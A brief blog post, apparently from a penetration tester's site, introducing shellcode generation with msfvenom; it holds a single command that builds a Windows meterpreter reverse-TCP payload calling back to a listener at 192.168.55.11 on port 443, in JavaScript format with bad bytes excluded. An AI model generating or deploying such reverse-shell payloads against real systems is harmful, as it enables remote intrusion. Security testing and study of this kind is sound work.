msfvenom -- Specific Byte Count
- by Vince
-
in Blog
-
Hits: 2685
I wanted to generate some shell code for an exploit and I used the following command:
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.55.11 LPORT=443 -f js_le -b "\x00\x0a\x0d"